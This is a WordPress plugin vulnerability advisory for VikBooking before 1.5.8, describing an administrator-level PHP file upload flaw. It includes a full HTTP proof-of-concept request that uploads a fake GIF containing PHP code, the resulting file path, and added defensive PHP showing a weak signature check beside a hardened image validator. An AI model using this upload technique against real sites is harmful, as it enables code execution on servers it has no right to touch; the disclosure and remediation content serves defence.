WordPress Plugin Vulnerabilities
VikBooking Hotel Booking Engine & PMS < 1.5.8 - Admin+ PHP File Upload
Description
The plugin does not properly validate images, allowing high-privilege users such as administrators to upload PHP files disguised as images and containing malicious PHP code.
Proof of Concept
Edit or add a Characteristic (/wp-admin/admin.php?option=com_vikbooking&task=carat) and upload a fake GIF with PHP code in it as the Characteristic Image:

POST /wp-admin/admin.php HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------119541905442224294322517652959
Content-Length: 1469
Connection: close
Cookie: [admin+]
Upgrade-Insecure-Requests: 1

-----------------------------119541905442224294322517652959
Content-Disposition: form-data; name="caratname"

WiFi
-----------------------------119541905442224294322517652959
Content-Disposition: form-data; name="caraticon"; filename="phpinfo.php"
Content-Type: image/gif

GIF89a; <?php phpinfo() ?>
-----------------------------119541905442224294322517652959
Content-Disposition: form-data; name="resizeto"

250
-----------------------------119541905442224294322517652959
Content-Disposition: form-data; name="carattextimg"

<i class="fas fa-wifi vbo-icn-carat vbo-pref-color-text"></i>
-----------------------------119541905442224294322517652959
Content-Disposition: form-data; name="ordering"

1
-----------------------------119541905442224294322517652959
Content-Disposition: form-data; name="task"

updatecarat
-----------------------------119541905442224294322517652959
Content-Disposition: form-data; name="whereup"

1
-----------------------------119541905442224294322517652959
Content-Disposition: form-data; name="option"

com_vikbooking
-----------------------------119541905442224294322517652959
Content-Disposition: form-data; name="vikwp_nonce"

2817d7732a
-----------------------------119541905442224294322517652959--

The PHP file will be at https://example.com/m/wp-content/plugins/vikbooking/site/resources/uploads/phpinfo.php
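A defender-side illustration of the missing validation, added here and not VikBooking's own code: a signature-only check of the kind the PoC body ("GIF89a;" followed by PHP) slips past, beside a stricter server-side validator. Function names are hypothetical; it assumes PHP 7.4+ with the fileinfo and GD extensions.

```php
<?php
// Added example (not VikBooking code). Hypothetical names; assumes PHP 7.4+
// with the fileinfo and GD extensions available.

// Weak check: looks only at the GIF signature, so the PoC body
// "GIF89a; <?php phpinfo() ?>" passes and gets stored as phpinfo.php.
function weak_is_image(string $path): bool
{
    $head = file_get_contents($path, false, null, 0, 6);
    return $head === 'GIF89a' || $head === 'GIF87a';
}

// Hardened upload: extension allowlist, server-side MIME sniffing, a full
// GD decode, a re-encode so only pixel data is written, and a server-chosen
// file name. Returns the stored path, or null when the upload is rejected.
function hardened_image_upload(string $tmp, string $orig_name, string $dest_dir): ?string
{
    $allowed = ['gif' => 'image/gif', 'png' => 'image/png',
                'jpg' => 'image/jpeg', 'jpeg' => 'image/jpeg'];
    $ext = strtolower(pathinfo($orig_name, PATHINFO_EXTENSION));
    if (!isset($allowed[$ext])) {
        return null;            // "phpinfo.php" is rejected here
    }
    $sniffed = (new finfo(FILEINFO_MIME_TYPE))->file($tmp);
    if ($sniffed !== $allowed[$ext]) {
        return null;            // the client-sent Content-Type is never consulted
    }
    // getimagesize() reads only the header, so a signature stub can still pass it;
    // the real decision is the full decode below.
    if (@getimagesize($tmp) === false) {
        return null;
    }
    $img = @imagecreatefromstring((string) file_get_contents($tmp));
    if ($img === false) {
        return null;            // not a decodable image, whatever it claims to be
    }
    $name = bin2hex(random_bytes(8)) . '.' . $ext;
    $dest = rtrim($dest_dir, '/') . '/' . $name;
    if ($ext === 'gif') {
        $ok = imagegif($img, $dest);
    } elseif ($ext === 'png') {
        $ok = imagepng($img, $dest);
    } else {
        $ok = imagejpeg($img, $dest);
    }
    imagedestroy($img);
    return $ok ? $dest : null;  // any bytes after the image data are gone
}
```

In a WordPress plugin the extension/MIME consistency part is what wp_check_filetype_and_ext() provides; as defence in depth, the upload directory should also be served with PHP execution disabled so a file that does get through is never executed.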
Miscellaneous
Original Researcher
Gabriel3476
Submitter
Gabriel3476
Verified
Yes
Timeline
Publicly Published
2022-04-21
Added
2022-04-21
Last Updated
2022-04-22